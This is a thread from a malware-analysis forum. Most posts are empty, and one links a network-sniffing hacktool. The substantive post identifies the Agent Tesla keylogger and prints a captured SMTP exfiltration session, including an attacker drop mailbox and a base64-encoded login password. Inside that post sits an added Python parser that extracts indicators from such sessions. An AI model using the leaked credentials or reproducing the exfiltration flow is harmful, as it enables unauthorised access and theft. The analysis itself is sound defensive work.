Malware collection

Forum for analysis and discussion about malware.
FafZee
Posts: 24
Joined: Tue Mar 19, 2013 11:08 am

Re: Malware collection

Post by FafZee » Wed Mar 08, 2017 3:15 pm

Not real malware but a hacktool.

More details on it:
hxxp://sniff.su/ ("official" site)
https://github.com/intercepter-ng/mirror (for the binaries)

Br,

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Mar 11, 2017 10:48 am

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Mar 16, 2017 5:45 pm

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Mar 30, 2017 3:24 pm

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Apr 07, 2017 5:28 pm

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Apr 08, 2017 1:04 pm

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Apr 08, 2017 6:51 pm

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Mon Apr 17, 2017 10:39 am

Antelox
Posts: 178
Joined: Sun Mar 21, 2010 10:38 pm

Re: Malware collection

Post by Antelox » Mon Apr 17, 2017 3:00 pm

This is the Agent Tesla keylogger. A sample of the email header sent containing exfiltrated data:
EHLO [redacted]
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
RWlnaHRpczg4
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
MIME-Version: 1.0
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Date: 17 Apr 2017 20:54:42 +0200
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
BR,

Antelox
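The capture above is what an analyst would want to pull indicators out of automatically: the AUTH LOGIN username (the drop mailbox, base64-encoded), the envelope addresses and the tagged Subject. The following Python parser is an added example, not code from the post; the names parse_exfil_session and b64_text are my own, and the sample session is constructed from the posted header with the password line replaced by base64("REDACTED").

```python
import base64
import re

# Constructed sample of an Agent Tesla SMTP exfiltration session, modelled on the
# capture posted above; the AUTH LOGIN password line is replaced by base64("REDACTED").
SAMPLE_SESSION = """EHLO [redacted]
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
UkVEQUNURUQ=
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
"""
ADDR_RE = re.compile(r"<([^>]+)>")

def b64_text(token):
    """Decode one base64 token to text, or None if it is not valid base64."""
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (ValueError, TypeError):
        return None

def parse_exfil_session(session):
    """Extract drop mailbox, envelope addresses and Subject from a captured SMTP session.
    The AUTH LOGIN password is only detected, never decoded."""
    lines = session.splitlines()
    r = {"auth_user": None, "password_present": False, "mail_from": None,
         "rcpt_to": [], "subject": None, "agent_tesla": False}
    for i, line in enumerate(lines):
        up = line.upper()
        if up.startswith("AUTH LOGIN"):
            parts = line.split(None, 2)
            # Username is inline in the capture above; some clients send it on the next line.
            user_idx = i if len(parts) == 3 else i + 1
            user_tok = parts[2] if len(parts) == 3 else (lines[user_idx] if user_idx < len(lines) else "")
            r["auth_user"] = b64_text(user_tok)
            r["password_present"] = user_idx + 1 < len(lines) and b64_text(lines[user_idx + 1]) is not None
        elif up.startswith("MAIL FROM:") or up.startswith("RCPT TO:"):
            m = ADDR_RE.search(line)
            addr = m.group(1) if m else line.split(":", 1)[1].strip()
            if up.startswith("MAIL"):
                r["mail_from"] = addr
            else:
                r["rcpt_to"].append(addr)
        elif up.startswith("SUBJECT:"):
            r["subject"] = line.split(":", 1)[1].strip()
            r["agent_tesla"] = "[agent tesla]" in r["subject"].lower()
    return r
```

Run parse_exfil_session(SAMPLE_SESSION) to get the decoded drop mailbox and the Agent Tesla subject flag; feed it lines from an SMTP follow stream of a real trace in the same way.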

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Apr 21, 2017 5:08 pm
